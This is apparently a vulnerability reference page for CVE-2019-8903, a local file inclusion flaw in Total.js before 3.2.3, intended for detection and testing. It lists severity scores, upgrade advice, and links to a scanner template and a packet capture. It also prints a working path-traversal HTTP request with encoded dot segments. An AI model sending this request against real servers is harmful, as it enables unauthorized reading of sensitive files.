🔙 목록으로 돌아가기

CVE-2019-8903: Totaljs <3.2.3 - Local File Inclusion

TitleTotaljs <3.2.3 - Local File Inclusion
Authormadrobot
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
RemediationUpgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
CVSS Score7.5
EPSS Score0.53251
CVE IDCVE-2019-8903
CWE IDCWE-22
Tags cve2019 cve totaljs lfi node.js vuln

🔍 Vulnerability Description

Total.js Platform before 3.2.3 is vulnerable to local file inclusion.

🌐 HTTP Request

GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-8903.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-8903.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A